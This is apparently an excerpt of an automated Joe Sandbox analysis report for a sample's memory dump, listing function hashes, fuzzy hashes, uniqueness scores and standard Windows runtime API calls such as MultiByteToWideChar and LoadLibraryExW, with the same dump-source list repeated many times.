          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6e81a17722138511301d0456e6c5f46c4e6c2561eb0ec342c69e752dd95ea0cc
          • Instruction ID: 69caedaff53a32cf9f84b61080e56578b4a4796c08985771db7bcbd441517831
          • Opcode Fuzzy Hash: 6e81a17722138511301d0456e6c5f46c4e6c2561eb0ec342c69e752dd95ea0cc
          • Instruction Fuzzy Hash: ACF0A032A10320DBCF26DB4CE989A49B3BCEB45B10F150056E000EB250CAB0DE00D7F0
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c201f49c8d6c2e1273913874b6a33040c82bdadbe80f00842f35dd1f34a3a301
          • Instruction ID: 1fdfa4a22cd16f08d63b81c6dd03536a95621984ec26f387f6a767590c5d4b96
          • Opcode Fuzzy Hash: c201f49c8d6c2e1273913874b6a33040c82bdadbe80f00842f35dd1f34a3a301
          • Instruction Fuzzy Hash: 0FE06532600308EFCB06CB69C685A09B3E8EB89755F6440A8E409EB250EB34DE44CB20
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 284091747675415f6a2457686d38ce16d2ed10c3e0d7de09498604a4723b3c4b
          • Instruction ID: 188dcace0a908e4df7e9ffccae412f84c6fda406cc74761b986e8eb714f6d227
          • Opcode Fuzzy Hash: 284091747675415f6a2457686d38ce16d2ed10c3e0d7de09498604a4723b3c4b
          • Instruction Fuzzy Hash: 49E06D31601344DFCB06CB69C685A09B3E8EB85744F244068E409DB250EB34DE41CB60
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 995da92c87683585e521f1ae4326652287d4ebf09c1e5dcbfbbc63a588604e8f
          • Instruction ID: d93408ab39902936ae3237c22076c945248d45515d27db00cb7f45010e87a264
          • Opcode Fuzzy Hash: 995da92c87683585e521f1ae4326652287d4ebf09c1e5dcbfbbc63a588604e8f
          • Instruction Fuzzy Hash: 13E0E235511248EFCB04DBA8C549F4AB7F8EB48794F6149A4F409D7251D634EF80DA20
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetCPInfo.KERNEL32(?,?), ref: 00D3E383
          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D3E40F
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D3E47A
          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D3E496
          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D3E4F9
          • CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00D3E516
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ByteCharMultiWide$CompareInfoString
          • String ID:
          • API String ID: 2984826149-0
          • Opcode ID: 6d94c047d281f1b570dc461bf36d01e7c5097736d0ddbe65ba736104396c0e75
          • Instruction ID: 4cd7bb398e7bbe60d60b82a63347ab308e99f2570112e81ab11a6b23418afb18
          • Opcode Fuzzy Hash: 6d94c047d281f1b570dc461bf36d01e7c5097736d0ddbe65ba736104396c0e75
          • Instruction Fuzzy Hash: 7A71AB72900259ABDF319FA4C885BEEBBB9EF09315F180164E945BB2D1E774CC049BB0
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00D1AAA3
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 00D1AB0E
          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1AB2B
          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D1AB6A
          • LCMapStringEx.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D1ABC9
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D1ABEC
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: ByteCharMultiStringWide
          • String ID:
          • API String ID: 2829165498-0
          • Opcode ID: 714dd654c4f753ee5cc7f1ce81522b429e09a66d8176f72626fdf1bbdaf7cd53
          • Instruction ID: 95d6e7875f71b4097c5ab7dec8d16a18ab5c724d6d78f1b813dcfcedbd301475
          • Opcode Fuzzy Hash: 714dd654c4f753ee5cc7f1ce81522b429e09a66d8176f72626fdf1bbdaf7cd53
          • Instruction Fuzzy Hash: 2A51BE76501216BFEB218FA8ED44FEB7BBAEF44740F184128B905A6190DB30CD80DBB1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetModuleFileNameW.KERNEL32(00000000,00E24C52,00000104), ref: 00D83984
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: FileModuleName
          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
          • API String ID: 514040917-4022980321
          • Opcode ID: f9bed05ccf4c4eb699141a2766f032ec3ecaba815660fd565736f6b63b1d6aa9
          • Instruction ID: 4ba7168376b788e2acfd905bf5d07bf96e57bcbb9e2bd06568ca287228c89410
          • Opcode Fuzzy Hash: f9bed05ccf4c4eb699141a2766f032ec3ecaba815660fd565736f6b63b1d6aa9
          • Instruction Fuzzy Hash: 94216AB2A822416BD628B3266C4BFAB765CCB91F10B080835FD4CA21C5FA91CB05C7B1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00000000,00DAF5A7,000000FF,?,00D853B8,?,?,00D85367,?), ref: 00D8548A
          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D8549C
          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DAF5A7,000000FF,?,00D853B8,?,?,00D85367,?), ref: 00D854BE
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: AddressFreeHandleLibraryModuleProc
          • String ID: CorExitProcess$mscoree.dll
          • API String ID: 4061214504-1276376045
          • Opcode ID: ed569dbe9550190ea465fcbfb03fc4892292adbca9ed07fc7e2a9186e7d875c5
          • Instruction ID: dc52e28df765118accf72cff0a67532b880d10fbfa2d47c105c4cac2640f1c3e
          • Opcode Fuzzy Hash: ed569dbe9550190ea465fcbfb03fc4892292adbca9ed07fc7e2a9186e7d875c5
          • Instruction Fuzzy Hash: 0B01DB35900A19EFDB219F55DC09FEEB7B8FB04711F044626F812B22D0DB749905CB60
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D8A75A), ref: 00D8A7CD
          • GetLastError.KERNEL32(?,00D8A75A), ref: 00D8A7D7
          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D8A815
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: LibraryLoad$ErrorLast
          • String ID: api-ms-$ext-ms-
          • API String ID: 3177248105-537541572
          • Opcode ID: 44871a421480e68ecacf42764bbbd967bf84208106a11e21bfdd08341b8ced5d
          • Instruction ID: 5f5ee0e462d0a0268b136c56dbc3a2cd2efd49a6790cb45529f0e7be0263f948
          • Opcode Fuzzy Hash: 44871a421480e68ecacf42764bbbd967bf84208106a11e21bfdd08341b8ced5d
          • Instruction Fuzzy Hash: 51F03731684204BBEF302F51EC06F5A3E659B10B51F188031FD0EB40E2E7A5D95A9F75
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8ba844d1dfacd2c95c8718a2361bef7a20c747309ff52b4c5af82431444ae61b
          • Instruction ID: f77292b5b3f8a7b5731580cf48a8940c95b3e40814881de087bd3ec3e4afa997
          • Opcode Fuzzy Hash: 8ba844d1dfacd2c95c8718a2361bef7a20c747309ff52b4c5af82431444ae61b
          • Instruction Fuzzy Hash: 54B1FF74E04649AFDB15EF99C880BADBBB5FF49314F184158E805AB292CB70DA46CF70
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • _ValidateLocalCookies.LIBCMT ref: 00D45507
          • _ValidateLocalCookies.LIBCMT ref: 00D45598
          • _ValidateLocalCookies.LIBCMT ref: 00D45618
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: CookiesLocalValidate
          • String ID: csm
          • API String ID: 2268201637-1018135373
          • Opcode ID: a80e0059cd0b320f598b0b82b2523fa749a06ac74c3b8a3d4e807830ade51e24
          • Instruction ID: adef3ad76f1f2cde5d0d4083863d0d04a3ee72d6563bf956195f5700fed49009
          • Opcode Fuzzy Hash: a80e0059cd0b320f598b0b82b2523fa749a06ac74c3b8a3d4e807830ade51e24
          • Instruction Fuzzy Hash: BA41A134A00604EBCF10DF68E841BAE7BA6EF45324F588095E8189B29BD731DA15CFB1
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00D5006C), ref: 00D50267
          • GetLastError.KERNEL32(?,00D5006C), ref: 00D50271
          • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00D50299
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
          Similarity
          • API ID: LibraryLoad$ErrorLast
          • String ID: api-ms-
          • API String ID: 3177248105-2084034818
          • Opcode ID: 0d3376c59d9a353f19b7f0a28ceef7d0e3adf9feb9047bbdb25a59f36b714c62
          • Instruction ID: 507d0aa79f7ae733f0e5f066e599aec8ff4b67e8d83cb10aa92514fe2e160faf
          • Opcode Fuzzy Hash: 0d3376c59d9a353f19b7f0a28ceef7d0e3adf9feb9047bbdb25a59f36b714c62
          • Instruction Fuzzy Hash: A7E04F30680208BFEF301F62EC4AF593F55AB10B56F184020FD4DB80E1DBE1D95DAA68
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • GetConsoleOutputCP.KERNEL32(?), ref: 00D8C13B
          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D8C396
          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D8C3DE
          • GetLastError.KERNEL32 ref: 00D8C481
          Memory Dump Source
          • Source File: 00000000.00000002.1660951225.0000000000D0F000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
          • Associated: 00000000.00000002.1660931994.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D01000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000D0B000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1660951225.0000000000DAB000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661073695.0000000000DB3000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661098394.0000000000DC7000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661147881.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661170625.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661188825.0000000000E23000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661205992.0000000000E24000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E26000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1661223889.0000000000E28000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d00000_PASS-1234.jbxd
